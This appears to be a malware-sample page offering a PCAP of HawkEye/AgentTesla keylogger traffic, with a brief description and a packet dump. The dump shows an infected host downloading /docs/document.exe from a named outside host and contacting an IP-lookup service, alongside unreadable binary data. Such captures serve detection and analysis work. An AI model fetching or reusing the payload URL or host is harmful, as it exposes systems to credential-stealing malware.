AVAST? Business Antivirus Managed 1 Year-AS-EN

HawkEye AgentTesla Ransomware Keylogger Trojan Malware PCAP File Download Traffic Sample


Download Attachments

  • 1 pcap document
    Date added: February 10, 2020 12:54 am Added by: admin File size: 2 MB Downloads: 197

AgentTesla/HawkEye

Hawkeye often gets installed in a bundle with other malware. This is a Trojan and keylogger that is used to retrieve private information such as passwords and login credentials. This is an advanced malware that features strong anti-evasion functions.

2020-02-08 21:06:37.358933 IP 192.168.86.25.56314 > 103.21.59.28.80: Flags [P.], seq 943967658:943968182, ack 1690180958, win 16514, length 524: HTTP: GET /docs/document.exe HTTP/1.1
E..4.p@…7a..V.g.;….P8C..d..^P.@…..GET /docs/document.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=91939-
Unless-Modified-Since: Thu, 06 Feb 2020 12:13:08 GMT
If-Range: “4200037-197800-59de7322fa108”
Host: www.tashipta.com
Connection: Keep-Alive

2020-02-08 21:10:22.298098 IP 192.168.86.25.56315 > 23.23.73.124.443: Flags [P.], seq 1026995435:1026995552, ack 2459614608, win 64240, length 117
E… .@…yU..V…I|….=6……P…y…….p…l..^…N/…j.$.5.”…T…..O…..5…./.5…
….. .
.2.8…….+…………..api.ipify.org.
…………..
2020-02-08 21:10:22.334378 IP 23.23.73.124.443 > 192.168.86.25.56315: Flags [P.], seq 2921:4097, ack 117, win 29200, length 1176
E…..@…l…I|..V………=6.P.r..R.....w.4.......-.7...g ..B.E..h..f$7.)..F.%……(jDp&#b…o…p.Vw.x..%…Pr..:…c4…q… ..o….x0..t0………’f.V.I….p….”0.. *.H……..0o1.0 ..U….SE1.0…U.
..AddTrust AB1&0$..U….AddTrust External TTP Network1″0 ..U….AddTrust External CA Root0…000530104838Z..200530104838Z0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U.
..COMODO CA Limited1+0)..U…”COMODO RSA Certification Authority0..”0.. *.H………….0..
…….T..
V…$…Dgt.+7.}#p.q.S…..K..V..pr.a..K…=…a…….> .>…4z..k……zv.q…….l……~…./O…..gCr……k,…….~..n…..$.Ckb.U….l……..li..xH0E…..2.Q’.g….k.F.. …e.H…N…F7…..HCgNr*.\.L.(.\”{……Q.. FNm>…..|3WA<.Q…\.,c..W.?..]…E…Z$…V=.o..IX……..7…..:..CB………….(V…. .q….=…H.<….”L….V;….[…”R…i..Le…-pt…g.)iR….PjUF…(a.p….,!.G.(..Ev…’…..P.k.L.q0……..@…B…3:..A..c..qk+….1\:jG..yY. …j..r.WJ.K…..LA…=^(…..Q..G..S……..0..0…U.#..0……z4.&…&T….$.T.0…U……..~.=…<….8…22.0…U………..0…U…….0….0…U. . 0.0…U. .0D..U…=0;09.7.5.3http://crl.usertrust.com/AddTrustExternalCARoot.crl05..+.. 2020-02-08 21:10:22.334395 IP 23.23.73.124.443 > 192.168.86.25.56315: Flags [P.], seq 5557:5851, ack 117, win 29200, length 294 E..N..@…p_..I|..V……..D=6.P.r..=...MS.:m\4J .....eA.B..r.F..>..z.H.f.;........H...".....e)v%.}...} ...eXh=…j……).s.%…L…d.N…h…….2….~.)…..m.K..]Z…..A…#.e…...:8N.....3s.,.S...g.....d..&.e.&.2)...f.W.......f...Z>…….f;..H…..H..U…..s…7..
‘…./>U..S..0VYrz...Q.K.I……6t…e…. …2……… 2020-02-08 21:10:22.348170 IP 192.168.86.25.56315 > 23.23.73.124.443: Flags [P.], seq 117:251, ack 5851, win 64240, length 134 E… .@…yA..V…I|….=6....jP...........F...BA.…..S..[.z..V–)B.((.4..&….i(c..’.M70…1{&uL…L…..q…………..0~.. ….k.)..|..1..7……YD…L.8..?.t……9. 2020-02-08 21:10:22.377158 IP 23.23.73.124.443 > 192.168.86.25.56315: Flags [P.], seq 5851:5910, ack 251, win 30016, length 59 E..c..@…qI..I|..V……..j=6..P.u@w………….0…/.$….$e…^.SJ.[:..O…;. ….oy…?..^.R.. 2020-02-08 21:10:22.431475 IP 192.168.86.25.56315 > 23.23.73.124.443: Flags [P.], seq 251:352, ack 5910, win 64181, length 101 E… .@…ya..V…I|….=6……P………...........m..yl.;.....Y.v5...*m..?fj.G...@.8..A.4...G.m…QfM..>RO..k.B=.v.t…VE..<.[t..[N(..,. 2020-02-08 21:10:22.456994 IP 23.23.73.124.443 > 192.168.86.25.56315: Flags [P.], seq 5910:6123, ack 352, win 30016, length 213 E…..@…p…I|..V………=6.KP.u@.q………=6………v6..z$…th..c.. .4.’. ..5?../…… ..s].]O6xz18…iG.&….].y..,...+…].,.r…Lqj9:…AO`.b ..;;}.t.H…..O…….{…z….{4.)p….@..1u.>…N 2020-02-08 21:10:22.692499 IP 23.23.73.124.443 > 192.168.86.25.56315: Flags [P.], seq 5910:6123, ack 352, win 30016, length 213 E…..@…p…I|..V………=6.KP.u@.q………=6………v6..z$…th.*.c.. .4.’. ..5?../…… ..s].]O6xz1

Please follow and like us:

Written By

admin

Leave a Reply